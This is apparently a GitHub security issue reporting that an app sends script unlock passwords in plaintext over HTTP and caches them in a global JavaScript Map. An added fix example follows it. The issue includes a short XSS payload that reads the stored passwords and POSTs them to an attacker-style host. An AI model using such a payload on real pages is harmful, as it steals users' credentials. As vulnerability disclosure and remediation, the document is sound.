Security Vulnerability: Plaintext Transmission and Client-Side Storage of Passwords #148

@ArshVermaGit

Description

The application transmits and stores script unlock passwords insecurely across two critical surfaces:

1. Plaintext Network Transmission

Script unlock passwords are sent to the server as plain text within JSON request bodies (e.g., {"password": "..."}) over HTTP. Since the application is commonly served over unencrypted HTTP (typical for local/dev tools), these credentials can be trivially intercepted by any attacker with network visibility (e.g., via packet sniffing, ARP spoofing, or a compromised router on a shared network).

2. Persistent Client-Side Memory Storage

Passwords for unlocked scripts are stored in a frontend JavaScript Map object (unlockCredentials) for the duration of the browser session. This in-memory credential cache is globally accessible from any JavaScript context running on the page.

Attack Vector

  1. Network Interception: An attacker on the same network monitors HTTP traffic and captures the plaintext password field from API requests to /api/scripts/run or /api/scripts/lock.
  2. XSS-Based Exfiltration: If a DOM-Based XSS vulnerability exists (or is introduced), a malicious script can trivially read the unlockCredentials map and exfiltrate every password the user has entered during their session — effectively compromising all locked scripts at once.
```javascript
// Example XSS payload that exfiltrates all stored passwords
const stolen = Object.fromEntries(unlockCredentials);
fetch('https://attacker.com/collect', {
    method: 'POST',
    body: JSON.stringify(stolen)
});
```
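An added example, not code from the issue or the project, showing the defender-side counterpart to the two findings: a transport check that refuses to send the password over non-loopback HTTP, and a closure-scoped store that retains only an opaque unlock token rather than the password. The `requestToken` exchange and the `Bearer` header are assumptions about a possible fix, not the application's actual API.

```javascript
// Added example (not from the issue or the project). Addresses the report's
// two findings: (1) do not send the password over plain HTTP to anything but
// a loopback host, and (2) keep no plaintext password in a page-global Map.
// The server token exchange (requestToken) is an assumed fix, not the real API.

// (1) Transport check: only loopback hosts may use http:; all others need https:.
function isSecureTransport(endpoint) {
  const u = new URL(endpoint);
  if (u.protocol === 'https:') return true;
  const host = u.hostname.replace(/^\[|\]$/g, ''); // Node keeps [] around IPv6
  return u.protocol === 'http:' && ['localhost', '127.0.0.1', '::1'].includes(host);
}

// (2) Closure-scoped store. requestToken(endpoint, scriptId, password) is
// assumed to POST the password exactly once and return an opaque, short-lived
// unlock token; the password itself is never retained after that call.
function createUnlockStore(endpoint, requestToken) {
  if (!isSecureTransport(endpoint)) {
    throw new Error(`refusing to send credentials over insecure transport: ${endpoint}`);
  }
  const tokens = new Map(); // held in this closure, not on window/globalThis

  return {
    async unlock(scriptId, password) {
      const token = await requestToken(endpoint, scriptId, password);
      if (typeof token !== 'string' || token.length === 0) return false;
      tokens.set(scriptId, token); // only the token is kept, never the password
      return true;
    },
    // Header to attach to later /api/scripts/run calls in place of the password.
    authHeaderFor(scriptId) {
      const t = tokens.get(scriptId);
      return t === undefined ? null : { Authorization: `Bearer ${t}` };
    },
    // Drop the token when the user re-locks the script or the session ends.
    forget(scriptId) {
      tokens.delete(scriptId);
    },
  };
}
```

Because the store object carries only functions, `JSON.stringify(store)` yields `{}`; another script on the page that reaches the object still cannot read a password from it.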
